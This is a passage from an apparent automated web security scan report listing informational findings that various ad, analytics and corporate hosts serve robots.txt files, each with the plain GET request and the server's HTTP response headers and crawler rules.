Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

26.7. http://adclick.g.doubleclick.net/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adclick.g.doubleclick.net
Path:   /aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adclick.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:05:51 GMT
Server: AdClickServer
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.8. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:1ab5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Connection: close

User-agent: *
Disallow: /

26.9. http://adx.g.doubleclick.net/pagead/adview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:05:55 GMT
Expires: Wed, 07 Sep 2011 17:05:55 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

26.10. http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /ajax/libs/jquery/1/jquery.min.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Last-Modified: Mon, 23 Aug 2010 20:43:16 GMT
Date: Tue, 06 Sep 2011 15:32:35 GMT
Expires: Tue, 06 Sep 2011 15:15:08 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=0
Age: 0

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

26.11. http://altfarm.mediaplex.com/ad/bk/17353-119518-3840-0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/bk/17353-119518-3840-0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 15:37:49 GMT
Connection: keep-alive

User-agent: *
Disallow: /

26.12. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bizographics.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:00:31 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.13. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:11 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:32:11 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.14. http://assets1.csc.com/home/media/billboard195.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /home/media/billboard195.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: assets1.csc.com

Response

HTTP/1.0 200 OK
x-amz-id-2: PX8wfig8m2z77mZsQvH6itSiqgiuOU3XJq5NNYZ1CRAKkFEbyVKRS4OB5HCyy8cy
x-amz-request-id: 4D833E142B54D232
Date: Sat, 07 May 2011 03:24:45 GMT
x-amz-meta-s3fox-filesize: 588
x-amz-meta-s3fox-modifiedtime: 1270233164000
Last-Modified: Fri, 02 Apr 2010 18:33:10 GMT
ETag: "eae0a3837e8079ea9171c7fb85828c80"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 588
Server: AmazonS3
Age: 1702
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 1f332349b33dea0d6b53ccc2e31130b69dae72ff3a008be443100d91012d6a73744f7992e198d693,3c912d84690db1ee55013161e45bab283a8b15669ac825b11726f9385b2fc60b9922ca60c0c64678
Via: 1.0 a1c5ac3682794e4a6d3935bd273efd27.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

User-agent: *
Disallow: /insidecsc/
Disallow: /npsweb/
Disallow: /dupont/
Disallow: /digital_strategy/
Disallow: /careersca_en/downloads/DavidJones556x312.flv
Disallow: /careersca_en/media/Citrix2.swf
...[SNIP]...

26.15. http://at.amgdgt.com/ads/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Thu, 08 Sep 2011 15:37:51 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

26.16. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

26.17. http://blog.harbottle.com/dm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.harbottle.com
Path:   /dm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.harbottle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:23 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 02 Oct 2009 10:32:22 GMT
ETag: "4b0981-54-477a9980"
Accept-Ranges: bytes
Content-Length: 84
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /bd/wp-admin/
Disallow: /dm/wp-admin/
Allow: /bd
Allow: /dm

26.18. http://blogs.oracle.com/otn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /otn/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.oracle.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Last-Modified: Sat, 16 Jul 2011 10:06:38 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/plain; charset=UTF-8
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=214596302+0;age=10826;ecid=1131419376808517,0:1)
Content-Length: 393
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

User-agent: Ultraseek
Disallow:

User-agent: sunsearch-gsa-crawler
Disallow:

User-agent: Oracle Secure Enterprise Search
Disallow:

User-agent: *
Disallow: /images
Disallow: /roller-
Disallow: /them
...[SNIP]...

26.19. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bugzilla.mozilla.org

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs01
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 17:06:20 GMT
Keep-Alive: timeout=300, max=1000
Accept-Ranges: bytes
ETag: "10d-4a199cef3e040"
Connection: close
Last-Modified: Sat, 23 Apr 2011 18:04:41 GMT
Content-Length: 269

User-agent: Browsershots
Disallow:

User-agent: *
Disallow: /*.cgi
Disallow: /*show_bug.cgi*ctype=*
Allow: /
Allow: /*index.cgi
Allow: /*page.cgi
Allow: /*show_bug.cgi
Allow: /*describecomponents.cgi

...[SNIP]...

26.20. http://c.betrad.com/surly.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /surly.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "9152d7f1724ed8fbcd2e0c87029f193c:1276881254"
Last-Modified: Fri, 18 Jun 2010 17:14:14 GMT
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:59:07 GMT
Connection: close
X-N: S

User-agent: *
Disallow: /

26.21. http://c.brightcove.com/services/viewer/federated_f9

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: text/plain
Content-Length: 64
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: keep-alive
Server:

User-agent: *
Disallow: /
Allow: /services/viewer/federated_f9*

26.22. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c.statcounter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Sep 2010 14:41:23 GMT
ETag: "28d92e6-1a-49166f495eac0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

26.23. http://cdn.gigya.com/JS/socialize.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /JS/socialize.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Apr 2011 14:26:21 GMT
ETag: "c8d91cc42ff5cb1:0"
Server: Microsoft-IIS/7.5
X-Server: web102
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 14:56:31 GMT
Content-Length: 28
Connection: close

User-agent: *
Disallow: /

26.24. http://cdn.krxd.net/config/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /config/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.krxd.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:59:49 GMT
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: Apache
X-Request-Time: D=409 t=1315320914126717
X-Served-By: logger-b001.krxd.net
Date: Tue, 06 Sep 2011 14:56:50 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

26.25. http://cdn5.tribalfusion.com/media/1956006/frame.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn5.tribalfusion.com
Path:   /media/1956006/frame.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 26
X-Reuse-Index: 21
Content-Type: text/plain
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

User-agent: *
Disallow: /

26.26. http://clickserve.dartsearch.net/link/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clickserve.dartsearch.net
Path:   /link/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clickserve.dartsearch.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:32:12 GMT
Expires: Tue, 06 Sep 2011 15:32:12 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

# disallow all spiders
User-agent: *
Disallow: /

# allow the Google Adwords link checker
User-agent: AdsBot-Google
Disallow:

# allow the MSN Adcenter link checker
User-agent: MSNPTC
Disallow:


26.27. http://clk.fetchback.com/serve/fb/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

26.28. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

26.29. https://cms.paypal.com/us/cgi-bin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cms.paypal.com
Path:   /us/cgi-bin/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cms.paypal.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 31 Mar 2010 21:55:38 GMT
Accept-Ranges: bytes
Content-Length: 374
Content-Type: text/plain; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

### BEGIN FILE ###

# PayPal robots.txt file

User-agent: *
Disallow: /xclick-auction/
Disallow: /affil/
Disallow: /*?cmd=_flow
Disallow: /*?SESSION
Disallow: /*?cmd=_s-xclick
Disallow: /subscription
...[SNIP]...

26.30. http://cnbc.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cnbc.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 02 Jun 2011 21:22:02 GMT
Accept-Ranges: bytes
ETag: "079141d6b21cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: close
Date: Tue, 06 Sep 2011 14:57:44 GMT
Age: 1233
Content-Length: 157

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/msnbc/SitemapIndex.xml

26.31. http://content.links.channelintelligence.com/images/blank.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.links.channelintelligence.com
Path:   /images/blank.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Length: 93
Content-Type: text/plain
Last-Modified: Sun, 18 Jul 2004 16:06:59 GMT
Accept-Ranges: bytes
ETag: "80132b41e16cc41:2ff7"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
Date: Tue, 06 Sep 2011 16:45:40 GMT
Connection: close

User-agent: * # applies to all robots
Disallow: / # disallow indexing of all pages

26.32. http://convctr.overture.com/images/cc/cc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://convctr.overture.com
Path:   /images/cc/cc.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: convctr.overture.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Last-Modified: Wed, 09 Jul 2008 01:24:35 GMT
ETag: "491b5-1a-48741353"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

26.33. http://d.ads.readwriteweb.com/spcjs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.ads.readwriteweb.com
Path:   /spcjs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.ads.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "107454-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

26.34. http://d1.openx.org/ck.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /ck.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "246a23-131-48f142a249100"
Accept-Ranges: bytes
Content-Length: 305
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

26.35. http://d7.zedo.com/jsc/d3/fl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:15:57 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

26.36. http://deloitte.12hna.com/preferences/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deloitte.12hna.com
Path:   /preferences/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: deloitte.12hna.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:19 GMT
Server: Apache/1.3.26 (Unix) Debian GNU/Linux PHP/4.4.0-0.dotdeb.0 mod_ssl/2.8.9 OpenSSL/0.9.6c
Last-Modified: Mon, 15 Oct 2007 16:06:41 GMT
ETag: "c2c586-a15-47139011"
Accept-Ranges: bytes
Content-Length: 2581
Connection: close
Content-Type: text/plain; charset=iso-8859-1

# robots.txt for Dbriefs U supplemental material and Group Attendance pages

User-agent: *

Disallow: /dbriefs_u/Dbriefs_U_Supplemental_Material.pdf
Disallow: /dbriefs_u/dbriefsu_supplemental_material
...[SNIP]...

26.37. http://dev.mysql.com/common/js/s_code_remote.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dev.mysql.com
Path:   /common/js/s_code_remote.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dev.mysql.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:56 GMT
Server: Apache/2.2.19 (Fedora)
Last-Modified: Tue, 27 Oct 2009 04:18:32 GMT
Accept-Ranges: bytes
Content-Length: 302
Connection: close
Content-Type: text/plain; charset=UTF-8

# don't index bychapter version of documentation
User-Agent: *
Disallow: /documentation/mysql/bychapter/
# or the actual file download pages
Disallow: /get/
# And logins
Disallow: /login/

# Like a ba
...[SNIP]...

26.38. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
Last-Modified: Sat, 03 Sep 2011 01:08:38 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=292 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9999
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

26.39. https://docs.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 17:06:34 GMT
Expires: Tue, 06 Sep 2011 17:06:34 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /$
Allow: /support/
Allow: /a/
Allow: /Doc
Allow: /View
Allow: /ViewDoc
Allow: /present
Allow: /Present
Allow: /TeamPresent
Allow: /EmbedSlideshow
Allow: /templates
Allow: /previe
...[SNIP]...

26.40. http://download.oracle.com/docs/html/E13982_01/wsassemble.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.oracle.com
Path:   /docs/html/E13982_01/wsassemble.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.oracle.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=21600
Content-Type: text/plain
Age: 4349
Date: Tue, 06 Sep 2011 15:54:59 GMT
Last-Modified: Tue, 06 Sep 2011 11:30:06 GMT
Expires: Tue, 06 Sep 2011 20:42:30 GMT
Content-Length: 368281
Connection: close

# http://download.oracle.com/robots.txt
# Generated: 2011-09-06T11:30Z
# Questions: Ted Gilchrist, Robert Crews
User-agent: *
Disallow: /otn/
Disallow: /docs/cds/
Disallow: /docs/hts/
Disallow: /docs/
...[SNIP]...

26.41. http://edge.sapient.com/assets/images/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.sapient.com
Path:   /assets/images/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: edge.sapient.com

Response

HTTP/1.0 200 OK
Content-Length: 125
Content-Type: text/plain
Last-Modified: Mon, 11 Oct 2010 06:11:21 GMT
Accept-Ranges: bytes
ETag: "bb8e5420b69cb1:1edd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:32:34 GMT
Connection: close

User-agent: *
Disallow: /admin
Disallow: /awards

# Sitemap Auto-Discovery
Sitemap: http://www.sapient.com/sitemap.xml

26.42. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/db_pages.getCourseDesc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: education.oracle.com

Response

HTTP/1.1 200 OK
ETag: "397990-dd-4cdd1e91"
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 11:01:37 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=0+0;age=0;ecid=72057716563588584,1)
Content-Length: 221
Date: Sat, 03 Sep 2011 05:33:20 GMT
Accept-Ranges: bytes

# no robots are allowed to access this site
User-agent: *
Disallow: /cgi-bin/checkout/
Disallow: /cgi-bin/shopcart/
Disallow: /pls/web_prod-plq-dad/show_desc.call_addcart

SITEMAP: http://education.o
...[SNIP]...

26.43. https://education.oracle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://education.oracle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: education.oracle.com

Response

HTTP/1.1 200 OK
ETag: "397990-dd-4cdd1e91"
Content-Type: text/plain
Last-Modified: Fri, 12 Nov 2010 11:01:37 GMT
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=0+0;age=0;ecid=144115297717247222,1)
Content-Length: 221
Date: Sat, 03 Sep 2011 05:33:20 GMT
Accept-Ranges: bytes

# no robots are allowed to access this site
User-agent: *
Disallow: /cgi-bin/checkout/
Disallow: /cgi-bin/shopcart/
Disallow: /pls/web_prod-plq-dad/show_desc.call_addcart

SITEMAP: http://education.o
...[SNIP]...

26.44. http://event.on24.com/r.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://event.on24.com
Path:   /r.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Fri, 21 Nov 2008 01:10:07 GMT
Accept-Ranges: bytes
Content-Length: 1433
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /clients/
Disallow: /demos/
Disallow: /images/
Disallow: /includes/
Disallow: /interface/
Disallow: /media/
Disallow: /vutils/
Disallow: /custom/
Disallow: /eventManag
...[SNIP]...

26.45. https://event.on24.com/eventRegistration/prereg/register.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://event.on24.com
Path:   /eventRegistration/prereg/register.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: event.on24.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:41 GMT
Server: Apache
Last-Modified: Fri, 21 Nov 2008 01:10:07 GMT
Accept-Ranges: bytes
Content-Length: 1433
Cache-Control: no-cache,must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /clients/
Disallow: /demos/
Disallow: /images/
Disallow: /includes/
Disallow: /interface/
Disallow: /media/
Disallow: /vutils/
Disallow: /custom/
Disallow: /eventManag
...[SNIP]...

26.46. http://events.oracle.com/search/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: events.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 13 Aug 2011 05:06:38 GMT
ETag: "6e8a13-57-4aa5bfea7d380"
Content-Type: text/plain
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (G;max-age=0+0;age=0;ecid=4342557318426269,0:1)
Date: Tue, 06 Sep 2011 17:06:41 GMT
Content-Length: 87
Connection: close

# /robots.txt for events.oracle.com and pressroom.oracle.com
User-agent: *
Disallow: /

26.47. http://executivevision.cnbc.com/

Summary

